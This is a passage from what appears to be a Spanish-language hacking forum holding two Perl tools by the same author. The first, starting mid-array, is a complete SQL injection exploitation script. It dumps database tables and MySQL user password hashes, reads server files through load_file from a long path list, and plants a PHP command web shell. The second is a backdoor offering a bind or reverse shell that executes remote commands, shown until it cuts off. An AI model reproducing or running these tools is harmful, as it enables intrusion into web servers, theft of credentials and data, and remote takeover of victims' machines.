var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); use LWP::UserAgent; use URI::Split qw(uri_split); installer(); my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); &head; unless(@ARGV == 2) { &menu; } else { &scan($ARGV[0],$ARVG[1]); } &finish; sub menu { print "[Page] : "; chomp(my $page=<STDIN>); print "\n[Bypass : -- /* %20] : "; chomp(my $bypass = <STDIN>); print "\n\n"; &scan($page,$bypass); } sub scan { my $page = $_[0]; print "[Status] : Scanning.....\n"; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { print "\n[-] Not vulnerable\n\n"; print "[+] Scan anyway y/n : "; chomp(my $op = <stdin>); if ($op eq "y") { motor($page,$_[1]); } else { head(); menu(); } } } sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; <STDIN>; &head; &menu; } } sub head { system 'cls'; print qq( @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ ); } sub length { print "\n[+] Looking for the number of columns\n\n"; my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); $total=~s/$number[0]/hackman/; savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[load_file] : ON\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; } } } sub menu_options { head(); print "[Target confirmed] : $_[0]\n"; print "[Bypass] : $_[1]\n\n"; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "[save] : /logs/webs/$save\n\n"; print "\n--== information_schema.tables ==--\n\n"; print "[1] : Show tables\n"; print "[2] : Show columns\n"; print "[3] : Show DBS\n"; print "[4] : Show tables with other DB\n"; print "[5] : Show columns with other DB\n"; print "\n\n--== mysql.user ==--\n\n"; print "[6] : Show users\n"; print "\n--== Others ==--\n\n"; print "[7] : Fuzzing files with load_file\n"; print "[8] : Read a file with load_file\n"; print "[9] : Dump\n"; print "[10] : Informacion of the server\n"; print "[11] : Create a shell with into outfile\n"; print "[12] : Show Log\n"; print "[13] : Change Target\n"; print "[14] : Exit\n"; print "\n\n[Option] : "; chomp(my $opcion = <STDIN>); if ($opcion eq "1") { schematables($_[0],$_[1],$save); &reload; } elsif ($opcion eq "2") { print "\n\n[Table] : "; chomp(my $tabla = <STDIN>); schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($opcion eq "3") { &schemadb($_[0],$_[1],$save); &reload; } elsif ($opcion eq "4") { print "\n\n[DAtabase] : "; chomp(my $data =<STDIN>); &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($opcion eq "5"){ print "\n\n[DB] : "; chomp(my $db =<STDIN>); print "\n[Table] : "; chomp(my $table =<STDIN>); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($opcion eq "6") { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($opcion eq "7") { &load($_[0],$_[1],$save); &reload; } elsif ($opcion eq "8") { ######################################## &loadfile($_[0],$_[1],$save); &reload; } elsif ($opcion eq "9") { print "\n\n[Table to dump] : "; chomp(my $tabla = <STDIN>); print "\n[Column 1] : "; chomp(my $col1 = <STDIN>); print "\n[Column 2] : "; chomp(my $col2 = <STDIN>); print "\n\n"; &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($opcion eq "10") { print "\n\n"; &details($_[0],$_[1],$save); &reload; } elsif ($opcion eq "11") { print "\n\n[Full Path Discloure] : "; chomp(my $path = <STDIN>); &into($_[0],$_[1],$path,$save); &reload; } elsif ($opcion eq "12") { $t = "logs/webs/$save.txt"; system("start $t"); &reload; } elsif ($opcion eq "13") { &head; &menu; } elsif ($opcion eq "14") { &finish; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); print "\n"; my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; chomp $table; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { print "\n\n[+] Finish\n\n"; <STDIN>; &head; &menu_options; } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; chomp $si; $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; chomp $table; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; chomp $si; $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n"; } } sub tabfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[2].".txt","\n"); print "\n"; if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] Searching tables.....\n\n"; for my $table(@buscar2) { chomp $table; $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2; $code = toma($injection); if ($code =~/ERTOR854/g) { $count++; print "[Table Found] : $table\n"; savefile($_[2].".txt","[Table Found] : $table"); }}} if ($count eq "0") { print "[-] Not found any table\n"; &reload; } } sub colfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[3].".txt","\n"); print "\n"; if ($_[0] =~/(.*)hackman(.*)/) { my $start = $1; my $end = $2; print "[+] Searching columns for the table $_[2]...\n\n"; savefile($_[3].".txt","[Table] : $_[2]"); for my $columns(@buscar1) { chomp $columns; $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))"; $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2); if ($code =~/ERTOR854/g) { print "[Column] : $columns\n"; savefile($_[3].".txt","[Column Found] : $columns"); } } } else { print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright; } } sub load { savefile($_[2].".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { print "\n[+] Searching files with load_file...\n\n\n"; my $start = $1; my $end = $2; for my $file(@files) { chomp $file; $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); chomp $code; if ($code=~/k0bra(.*)k0bra/s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print $1; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] File to read : "; chomp (my $file = <stdin>); $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); chomp $code; if ($code=~/k0bra(.*)k0bra/s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print $1; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}} sub dump { savefile($_[5].".txt","\n"); print "\n"; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { chomp $limit; $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub into { print "\n\n[Status] : Injecting a SQLI for create a shell\n\n"; my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); print "\n"; ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $path2 =~s/$1//; $dir =~s/$path1//ig; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a"; savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { print "[shell] : Not Found\n"; } } } } sub encode { my $string = $_[0]; $hex = '0x'; for (split //,$string) { $hex .= sprintf "%x", ord; } return $hex; } sub decode { $_[0] =~ s/^0x//; $encode = join q[], map { chr hex } $_[0] =~ /../g; return $encode; } sub bypass { if ($_[0] eq "/*") { return ("/**/","/**/"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } else {return ("+","--");}} sub ascii { return join ',',unpack "U*",$_[0]; } sub ascii_de { $_[0] = join q[], map { chr } split q[,],$_[0]; return $_[0]; } sub finish { &copyright; <STDIN>; exit(1); } sub installer { unless (-d "/logs/webs") { mkdir("logs/",777); mkdir("logs/webs/",777); } } sub copyright { print "\n\n\n\n(C) Doddy Hackman 2010\n\n"; } sub toma { return $nave->get($_[0])->content; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; exit(1); } # The End ?

#338

Scripting / [Perl] HeavenDoor 0.5

1 Diciembre 2011, 22:13 PM

La nueva version de este backdoor que hice hace tiempo

Código (perl) [Seleccionar]


#!usr/bin/perl
#HeavenDoor 0.5
#By Doddy H

use IO::Socket;
use Cwd;

if ($ARGV[0] eq "-reverse") {
if ($ARGV[1] =~/(.*):(.*)/) {
my $ip = $1;
my $port = $2;
conectar($ip,$port);
tipo();
}
}
elsif ($ARGV[0] eq "-backdoor") {
listar($ARGV[1]);
} else {
print "\n[+] Examples : $0 -backdoor 666 / -reverse localhost:666\n";
}

sub listar {
$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $_[0],
Listen    => SOMAXC,
Reuse     => 1);

print "[*] Heaven_Door Online\n[*] Port : $_[0]\n[*] PID : ".$$."\n\n";

while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
